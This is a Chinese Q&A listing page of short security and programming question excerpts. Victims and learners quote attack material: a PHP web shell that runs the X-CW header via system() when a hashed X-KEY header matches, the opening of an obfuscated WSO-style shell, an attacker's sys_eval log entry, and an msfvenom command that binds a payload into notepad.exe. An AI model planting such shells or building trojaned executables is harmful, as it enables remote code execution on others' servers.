服务器不知道为什么老是被不同地区登录。 我更改了服务器密码也没有用。 我通常使用的默认账号:Administrator 。而对方使用的是default。 我查看腾讯云服务器帮助说:Windows系统是无法使用密钥的。请问该怎么办。[图片]
浏览 398提问于2017-04-06
1回答
有可能解码恶意的md5散列吗?
、、、、
上下文:我的WordPress网站服务器上有一种病毒,它将自己注入到服务器上跨越两个不同站点的每个functions.php文件中。删除了严重混淆的病毒代码后,我对其进行了解码。(我不会让你对过程细节感到厌烦。)生成的代码是一个简单的后门,允许黑客只从他们控制的一个特定URL在系统级别上执行代码。
是否有可能解码md5哈希,从而了解是哪个恶意网站使用了我的服务器的后门?
浏览 0提问于2019-12-31得票数 1
回答已采纳
正如在标题中提到的,我想在星巴克的一个公共wifi网站上工作,在公共wifi上运行一个实时服务器有什么风险吗?
浏览 0提问于2019-03-17得票数 -1
回答已采纳
如果我明确告诉IE (仍在内部使用IE8 )使用带GCF前缀的gcf,Chrome就会被激活。缺点是目标站点内部的任何链接此后都会松开gcf前缀。期望的。
Apache的IE=edge,chrome=1的HTTP中增加了兼容X-UA的功能。GCF永远不会激活。我认为这是我们的IE8打包版本的一个普遍问题。它似乎忽略了所有与X-UA兼容的指令。
想知道是否有人遇到过同样的问题?或者是否有我可以查看的日志文件?或者增加调试?
浏览 2提问于2013-01-18得票数 0
1回答
是否有任何方法来捕获php命令而不是执行它们?有一个后门是在我的服务器中编码的,我能够得到后门的声明类和方法名称,但是我需要找到真正的代码。
浏览 3提问于2016-06-26得票数 0
回答已采纳
2回答
我有一个非官方的Windows,我注意到我的互联网连接被重置。通过仔细观察,我发现DNS服务器地址被设置为中国中的IP。为什么这不是后门的迹象?
浏览 0提问于2015-11-08得票数 2
回答已采纳
磁盘的GCloud调整导致无法使用的服务器。服务器无法访问来自云shell的数据,因为云shell不是VM,端口22是打开的,但是ssh不能工作。磁盘显示的大小是应该显示的两倍,并且操作系统是不正确的。
浏览 2提问于2022-06-02得票数 0
1回答
有几篇关于“厂商故意在网络设备上安装后门”的文章,例如硬件供应商提供每一种产品的后门。
他们发现了由供应商制造的后门。他们还提到,主要的网络设备公司在设备上设置后门,让支持人员紧急使用设备。如果他们发现了安全漏洞,他们希望能够轻松地修补它,而不必让用户下载并安装修复程序。
请注意,我正在考虑的后门不是埃德·斯诺登所说的“政府后门”。
这些后门是真的吗?
它们是必要的还是我们需要修补它?
这也是一种潜在的危险吗?
浏览 0提问于2018-08-26得票数 0
回答已采纳
如何使用Gun.js建立身份验证和授权层?例如,使用社交登录(谷歌、LinkedIn)或AWS认知、Auth0 (我们自己的RBAC服务器)?
浏览 6提问于2022-01-31得票数 2
回答已采纳
2回答
图形控制器VGA标准
、、、、
我试图通过VGA连接器为VGA监视器创建一个通用的图形控制器,但是我找不到任何好的在线资源来解释监视器使用的标准规范。我已经找到了所有的和一些资源来描述如何创建一个特定的图形控制器,比如这个,但是没有找到任何资源来描述实际需要的监控协议。
例如,我在任何地方都没有发现信号的不同部分之间的确切时间--在中,给出了特定的时间,但没有给出原因。是所有的部分都应该是这样的比例,还是在行之间的暂停时间方面有一些任意性,等等.如果您正在考虑在代码中实现伪代码(并且能够改变分辨率/颜色深度),那么伪代码会是什么样子?
同样,我正在寻找通用控制器的预期“协议”--类似于操作系统在没有指定监视器类型时所使用的内
浏览 4提问于2009-02-12得票数 1
刚在计算机上安装了Microsoft 2012和,并且正在尝试将数据库连接到服务器。服务器是用Windows身份验证设置的,但是软件会自动为sa分配密码,我无法在Configuration中更改密码。状态已启用。如何访问或更改sa的密码?
浏览 0提问于2018-03-13得票数 1
开发人员创建后门并在部署后离开后门有什么合理的理由吗?许多开发者说,他们不可避免地会保留一个。这是真的吗?
浏览 19提问于2020-01-24得票数 1
我安装了一些插件从我的Wordpress后端。尽管在后端进行了更改,但我没有在首页或插件部分看到任何反映这些变化的内容。我也不能再添加新的插件了。当我试图:
发生意外错误。WordPress.org或此服务器的配置可能有问题。如果您继续有问题,请尝试支持论坛。
在谷歌搜索之后,我去了cPanel > Health checks and Monitoring > Port80。该页面显示了许多被阻止的文件。以下是被封锁文件的屏幕截图:
即使在单击此页面上的Unblock Port按钮并等待24小时后,也会显示这些文件。
当我在后端进行修改时,应该先重新启动
浏览 0提问于2018-03-09得票数 0
回答已采纳
1回答
我们有Tomcat 6在生产服务器上与赛门铁克端点保护windows服务器2008服务器数据中心。Symantec在日志中显示以下行
SID: 27068系统感染: Trojan.Naid活动2攻击受阻。此应用程序的流量已被阻塞:\DEVICE\HARDDISKVOLUME4 4\TOMCAT 6.0\BIN\TOMCAT6.EXE
它清楚地显示系统感染了。Trojan.Naid到底是什么?我们的系统到底感染了什么?Windows和Tomcat组合在生产服务器中是否危险?
浏览 0提问于2018-10-30得票数 -1
我做了一个简单的c# tcp服务器客户端,并尝试在我的笔记本电脑和pc上连接它们。唯一有效的方法是完全关闭防火墙,这样服务器就可以监听了。我尝试将其添加为异常,但这不起作用。文件路径完全匹配,我尝试添加它,然后重新启动服务器,但也不起作用。我不想每次想运行Win防火墙时都要关闭它,任何帮助都很感谢。如果有人感兴趣,下面的代码是针对服务器和客户端的
客户端:
TcpClient TCPClient;
TCPClient = new TcpClient("my ipv4", 629);
Console.WriteLine("connected");
服务器:
Tcp
浏览 0提问于2016-12-04得票数 0
1回答
几天前,我在我的WordPress站点上注意到了一些事情
一个广告在页眉,一个在页脚。
数百篇我没有发布的新博客文章
以下是我为防止这种情况再次发生所做的事情
更新我的服务器密码
从头和footer.php中删除链接
我还在sitefiles文件夹下找到了许多xml文件,我将它们全部删除。所有这些文件都有同一品牌的内容。
还有几件事要注意:
当我做完上述步骤后回来,我发现又有两个帖子在几分钟前发布,但我没有发布。
另外,在昨天更改我的服务器密码后,我今天收到了一封电子邮件,其中有人试图访问我的服务器,并被该服务阻止。
我的website.com/
浏览 0提问于2018-12-01得票数 0
今天,我查看了wordpress网站,发现一个php文件中有以下代码:
根据的说法,这是一种编码(Eval64)攻击。下面的代码是什么意思?这与基本代码eval64黑客相同吗?
<?
$auth_pass = "2fba9596aec8aeb14a88461bbd708f97";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
$xYEzDu6r3EZT=&#
浏览 3提问于2014-09-23得票数 0
回答已采纳
我使用Security在SpringBoot API中实现了OAuth2.0。它工作得很好,目前需要在检查头可用性之后,使用额外的标头跳过身份验证。基本上,客户端将添加
跳过-auth:true//示例
然后,从服务器端,我们必须添加过滤器来检查skip值,如果是真的,我们需要跳过授权并授予访问资源的权限。
有人有这方面的解决方案的经验吗?或任何可能创建此请求功能的建议方法。
浏览 2提问于2019-10-01得票数 0
回答已采纳
2回答
我想在我的实时web服务器上安装cron,以运行本地文件夹的每日备份脚本。在安装cron时,是否需要注意安全问题?
我的web服务器使用Ubuntu 10.10。
浏览 0提问于2011-09-08得票数 6
回答已采纳
1回答
我有两个以锁步方式运行的DUT实例,一个运行T周期比另一个晚。我知道我可以使用reg_block.add_hdl_path向两个实例添加多个路径,用于后门访问。但是,我想在执行后门写入时反映实际的周期延迟行为,即第二个实例在第一个实例得到后得到新的值T周期。有办法吗?我能找到的唯一提示是uvm_reg_backdoor,但我不确定这是否对我有帮助。
浏览 4提问于2019-02-13得票数 0
1回答
我有一个使用openx服务横幅的系统。我最近注意到,/var/cache中的几个缓存文件包含受感染的代码。代码包含sql查询,这些查询在文件系统中创建多个php文件。这些文件是包含代码的web shell,使攻击者能够在openx服务器上执行操作系统命令。我的问题是我不知道缓存是如何被感染的。我不知道如何在缓存中创建新文件,以及攻击者如何控制它们的内容。是否有人熟悉这种情况,或能指出我的正确方向?
最终,我打算升级我的openx版本,但作为我的取证工作的一部分,了解攻击者的作案手法对我来说很重要。
浏览 0提问于2015-02-22得票数 3
1回答
在Azure发布管道成功完成后,我需要触发on。我看到Azure岗位部署盖茨正是为了这个目的而设计的。
我面临的问题是,我需要从DevOps服务器创建到on服务器的通用服务连接。我不知道这是否可能是出于安全考虑。在互联网上发现的所有案例都与互联网上部署的API有关,而不仅仅是在某个组织中可用。
如果还可以的话,你能分享一下吗?
浏览 2提问于2022-01-10得票数 0
回答已采纳
2回答
暴力破解事件通知!
尊敬的腾讯云用户,您好!
您的服务器 172.21.0.5(开发商账号:100005932924 instancd-id:ins-1nijwccn 地域:bj) 检测到存在未处理的来自 212.237.45.247 的暴力破解事件。您的服务器疑似被黑客入侵,请即刻前往云镜控制台查看详细信息。
这是怎么回事,小白不懂这是为什么
浏览 863提问于2018-06-06
1回答
从肯·汤普森的图灵奖演讲“信任思考”开始,软件后门的风险就很明显了。当然,这也适用于硬件。
限制我们在这里的软件,什么是真正好的解决方案,以防止后门?由于最近媒体关于国家对全球互联网监控的某些报道,人们对注定要保护IT安全的软件中潜在后门的担忧再次浮出水面,例如在http://www.golem.de/news/prism-skandal-furcht-vor-hintertueren-in-us-software-und-hardware-1306-100012.html (德语)中。
很久以前,我就了解到,为了符合编程语言编译器的标准,有各种各样的国家标准机构的测试中心,它们对软件进行验证
浏览 0提问于2013-07-03得票数 0
我的服务器被黑了,我在postgres日志里找到了这个
2017-12-19 06:30:16 COT STATEMENT: select sys_eval('pgrep baou87r1D9;pgrep 9rMhx24;pgrep Ps1fnYF3;pgrep P15xAw4;pgrep 8yV192n7;pgrep ktU5R693w2;pgrep VW5Ngjl;pgrep gwcaMW7;pgrep pvN195X8A;pgrep H80p3ao14Z;pgrep 6gBLwWlMrS;pgrep 78HgGw0L3;pgrep 5qKiw4e7gQ;pgrep iW35uq
浏览 0提问于2018-01-04得票数 0
回答已采纳
我使用的是Spring3.2,在尝试创建基于“远程”RMI服务的bean定义时出现以下错误。客户端和服务器都在同一台主机上实现。
org.springframework.remoting.RemoteLookupFailureException:
Lookup of RMI stub failed; nested exception is java.rmi.UnmarshalException: error unmarshalling return; nested exception is: java.io.EOFException.
我正在尝试部署到Glassfish 3.1.2。涉及的
浏览 9提问于2013-09-19得票数 0
2回答
我用来托管WordPress网站的共享服务器最近被黑客入侵,许多index.php文件、插件文件和上传文件都被删除了,而我的MySQL数据库却没有受到任何影响。但是,在从本地备份中恢复了所有这些之后,我遇到了一些奇怪的问题。
我的主页http://inversekarma.in没有完全加载-侧边栏和页脚都丢失了。如果我查看页面源代码,它就会在侧边栏的代码开始时结束。
我无法登录到仪表板。它会抛出一个500错误。
请帮我解决这个问题!
P.S.:在我从备份中恢复了文件之后,我在同一个域上有另一个WordPress博客,在http://inversekarma.in/photos上,它可以很好地工
浏览 0提问于2010-11-17得票数 1
回答已采纳
1回答
嘿,我在我的服务器上发现了一个php文件。我已经删除了。我对此感到担忧。我在网上找不到任何关于HTTP_X_KEY和HTTP_X_CW的东西。它们用在哪里?它们设置在哪里?代码片段: <?php
if (sha1($_SERVER['HTTP_X_KEY']) === '32d0703226477059ec090a0c8defc709ce7d0be0') {
system($_SERVER['HTTP_X_CW']);
} ?> 提前感谢您的帮助。
浏览 17提问于2021-03-25得票数 0
回答已采纳
因此,您可以使用msfpayload或msfvenom将有效负载添加到现有的exe中,大多数在线用户似乎使用反向shell。但我想知道您是否可以将您自己设计的自定义exe作为有效负载。例如,我有一个"evil_notepad.exe“,我想添加一个有效负载"showanalert.exe”。打开时,将运行"showanalert.exe“。
我尝试使用命令: msfvenom -p泛型/自定义-f exe -k -x notepad.exe PAYLOADFILE=showanalert.exe >evil_notepad.exe
这似乎是可行的,但却导致程序本身
浏览 0提问于2014-03-29得票数 1
我自己的一个论坛的一位版主就是这么做的。我还是不敢相信,我也不明白他是怎么做到的。有人能给我解释一下吗?他说他只使用HTTP GET请求
主持人说,服务器(nginx)通常会发送已执行的php文件的输出,但由于文件是777,因此将一些参数添加到URL中,他就可以得到它的未解析版本。
谢谢
浏览 7提问于2010-04-15得票数 0
5回答
我有一个代码库,需要一个代码审查来评估它的后门。
代码太大了,无法检查所有的代码,您建议如何处理这个问题。
它是一个带有oracle数据库的java web应用程序,代码是从一个非常大的产品中定制的。
自定义几乎涵盖了所有的代码基,但我可以自动识别定制代码。
浏览 0提问于2011-05-10得票数 9
回答已采纳
苹果能否在它的FileVault加密技术中建立一个后门?这是你在一般情况下使用封闭式加密产品的风险吗?使用像TrueCrypt这样的东西会更可靠吗?
浏览 0提问于2012-07-27得票数 4
回答已采纳
我使用ssh键连接到我的GitHub,这是我在github中白色添加的。我确实从我的linux服务器(托管在AWS中)拉/推到这个回购。
如果黑客能够访问这台AWS服务器,他会对我在github中的代码造成什么伤害?他/她能永久地从GitHub中删除我的回复吗?
浏览 0提问于2020-04-25得票数 2
最近,我拥有了一台安装了Ubuntu 18.04.3 LTS并在其上运行ssh服务器的计算机。在本地机器上,我看到登录屏幕上除了我想要登录的用户列表中的用户名之外,还有一个gitlab user。
在深入研究之后,我在/etc/passwd中找到了下面的一行:
gitlab:x:1007:1007:gitlab user,,,:/var/lib/gitlab:/bin/sh
我认为,之所以出现上述行为,是因为伦敦金融城( uid of gitlab user )超过了1000。我想知道如何将其更改为低于1000的内容,这样gitlab user就不会出现在我的登录屏幕上。
或者,它对apt a
浏览 0提问于2020-01-14得票数 2
回答已采纳
我已经开发了一个应用程序,这是注定在医院的平板电脑,供患者使用。
现在,我被要求使平板电脑的唯一功能是我的应用程序,以防止个人或任何人使用它进行网页浏览,游戏或其他任何事情。
这个是可能的吗?
浏览 0提问于2012-05-17得票数 19
回答已采纳
在运行我的Calabash测试时,我在android中有一个后门方法,我正在尝试调用这个方法。
后门方法在应用程序子类中,如calabash文档中所建议的那样。
但我得到了以下错误:
Error: {"result"=>"No such method found: setTestToken:([String])", "outcome"=>"ERROR", "details"=>"{receiverClass=com.test.mobile.ui.MainActivity, error=N
浏览 2提问于2016-10-25得票数 0
回答已采纳
1回答
从这个先前的问题中,我通常需要混淆存储在用户帐户中的一组第三方凭据,然后在内部Winforms软件客户端中使用这些凭证。以下是获接纳答案的计划:
密码创建和加密:
用户已经与内部系统进行了身份验证,为该系统选择了新的密码P,并/或更改了敏感数据D。
客户端软件散列P与SHA-512生产C。
客户端将C分割成两半,导致C1和C2。
客户端使用C1和随机生成的IV作为密钥,使用AES-256加密D,产生S(其中包括IV)。
客户端将U、C2和S传输到服务器。
服务器BCrypts C2生成H(包括随机盐)。
服务器在服务器中存储U、H和S。
普通登录:
用户输入登录凭据(用户名U和密码P)。
用S
浏览 0提问于2012-12-18得票数 9
回答已采纳
1回答
假设我有一个输入文件(someinputdata.txt)要加载到基于uvm的内存中,该内存声明如下,并在寄存器块(扩展uvm_reg_block的类)上实例化。
class mymemory extends uvm_mem;
`uvm_object_utils(mymemory)
function new(string name = "mymemory");
super.new(name, 32'h800, 32, "RW", UVM_NO_COVERAGE);
endfunction
endclass
我不确定是否有
浏览 6提问于2014-08-18得票数 0
这是一个很常见的问题。在GPL下的WordPress插件目录中有很多插件可用。而且许多插件都有一些后门登录尝试。所以,不能相信哪个插件是正确的使用。
如果我需要用一个未知的插件我没什么疑问,
如何找到后门登录问题?
防止后门登录的所有预防措施是什么?
有许多插件可用于检查安全问题。所以这里不要建议任何插件,因为我不能相信插件,这就是为什么我会知道找到它的可能方法。
请不要投反对票。因为我需要可能的方法来防止后门登录问题。我希望这将有助于其他人,谁感染了后门登录。因为,许多自由职业者在把它交给网站所有者的时候,会通过后门登录。
浏览 0提问于2015-11-21得票数 -3
我正在设置一个rails网站,将接受信用卡与ActiveMerchant和PayPal网站支付专业。我正在成功地测试PayPal沙箱,但也需要能够在我的活动站点上进行测试。我想实现一种解决方案,在我的实时站点上使用来自我自己域的电子邮件地址的注册使用PayPal沙箱,但对于其他所有人,它使用实时PayPal站点。这样,当我测试我的实时网站时,我不会自己付费,也不会在这个过程中被PayPal征税:-)
然而,问题是要让ActiveMerchant使用测试服务器,您需要编写以下代码行:
ActiveMerchant::Billing::Base.mode = :test
这将设置一个类变量,该变量
浏览 0提问于2009-06-16得票数 2
回答已采纳
2回答
最近,我正在研究XSS攻击,以及它们在网站上的破坏力。
令我惊讶的是,web (即使如此)是关于如何防止xss攻击的,但是在经过xss攻击之后,没有关于如何恢复网站的相关资源。
我遇到了一些事情,比如:
将备份网站代码上载到服务器上
下载整个站点并手动查找任何恶意脚本。
但是这些听起来还不够好.我是说,有没有其他专业的主动方法来恢复那些曾经被黑过的网站?
浏览 9提问于2013-12-24得票数 2
回答已采纳
谷歌最近在Google的几个服务中引入了客户端加密功能(参见https://support.google.com/a/answer/10741897?hl=en)。
客户端加密的目的是在传输到服务器(例如云服务)之前对用户端的数据进行加密,而不向服务器发送加密密钥。因此,服务器无法访问解密密钥并对数据进行解密。
不过,服务器(此处为Google)向客户端提供加密/解密方法(在Workspace情况下通过浏览器)。因此,我们必须相信谷歌能够如期实现这些功能(例如,使用最先进的加密技术,抵抗美国当局的密码分析等)。特别是,应该保证在加密/解密过程中,这些方法不存在泄露密钥的后门,并保证美国当局不会
浏览 0提问于2023-01-02得票数 1
通常可以使用使用地址和数据总线的访问技术来验证可综合寄存器(这些总线很大程度上是硅片上实际硬件的一部分)。但是这种传统的接入技术消耗了有限的时间。
使用UVM的寄存器抽象层(RAL)是在您的设计中验证RTL寄存器的一种非常有效的方法。该方法的一个主要特点是‘后门访问’,它可以在零仿真时间内访问(即读取或写入)任何RTL寄存器。后门访问机制使用分层的HDL路径来实现。
问题是硅上的物理规定使这种零时间访问成为可能?
浏览 7提问于2015-09-08得票数 2
1回答
我很好奇怎么会有人在Laravel的申请里留下后门?在我看来,没有办法,因为请求的入口点是一个路由文件,您必须为路由编写代码,这样才能执行某些操作。你的团队成员将能够找到它,并告诉你“嘿!那是什么?”
每个请求都有一个入口点,在这种情况下,该入口点是一个路由,它将调用特定的控制器及其方法。这里有一些可以执行的逻辑。
正如我们所知,您必须遵循一些非常干净的规则来编写SQL查询,因此CSRF保护已经存在。Laravel框架很好地处理了常见的安全漏洞。
那么,在web应用程序中留下后门的可能方法是什么呢?
浏览 0提问于2017-04-22得票数 -2
该网站是视频-de-musica.com,这是一个简单的wordpress博客音乐视频。不知怎么的,子域stats.visual-de-musica.com充满了垃圾邮件,我记得为pwiki统计数据设置了域,但后来卸载了它,我不记得它发生了什么事。
这是一个垃圾邮件页面stats.visual-de-musica.com/aal-0exe.htm的例子。
当你在谷歌上搜索可打印超人徽章蝙蝠侠,这是第一个结果,当你访问它时,你被重定向到一个“谷歌发现恶意软件可能被安装到你的计算机上,如果你继续”诈骗网站。
我已经尝试禁用所有插件,没有任何改变。
有谁知道发生了什么以及如何去除这个吗?
我正在下载
浏览 0提问于2011-04-24得票数 2
回答已采纳
我的主机提供商警告我,我的bootstrap.inc文件正在连接到受感染的主机。该问题发生在includes/bootstrap.inc文件(以下代码)的771到808行之间。
这个文件以某种方式不断变化(每周一次),从120kb到123kb。无论发生这种情况,我都会尝试上传一个干净的文件。如果文件被更改/被黑客攻击,我的主机响应会更长10-15秒。
Drupal7更新到了7.41,模块是最新的。导致问题的代码就在这些行之间的某个地方(我怀疑是"cookie“部分)。这是我的主机提供商警告我的被感染/添加的部分:
$_passssword = '2505363ea3554012
浏览 3提问于2016-01-28得票数 1
我有数据库X,它在两个不同的服务器上有不同的数据,我想将来自这两个服务器的数据组合到Marklogic中的新服务器上。
浏览 0提问于2020-09-24得票数 1
我在主服务器和从服务器上都有一个复制。
我不时地连接到从服务器,主要是为了获取信息或生成有关用户使用情况的统计信息。
但是我担心在某个时候我会运行一个写命令(INSERT/UPDATE/DELETE),以为我在主服务器上。
有什么方法可以告诉MariaDB:“不要接受从服务器中的插入/更新/删除命令”?
谢谢你的帮助!
浏览 0提问于2023-03-02得票数 1
回答已采纳
1回答
我想练习利用proftpd后门开发系统。我使用利用proftpd_133c_backdoor和有效载荷reverse_perl.I学习如何利用这个链接,https://www.youtube.com/watch?v=1Rp5_QysRpE&t=2s。
攻击者虚拟机是192.168.19.2。我的受害者虚拟机是192.168.19.5(proftpd 1.3.4a.)在受害者上打开的端口为21,版本号为proFTPD 1.3.4a
下面是利用漏洞和有效负载的配置。
msf exploit(unix/ftp/proftpd_133c_backdoor) > show options
浏览 0提问于2018-04-30得票数 0
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
实时音视频
对象存储
即时通信 IM活动推荐
腾讯云开发者
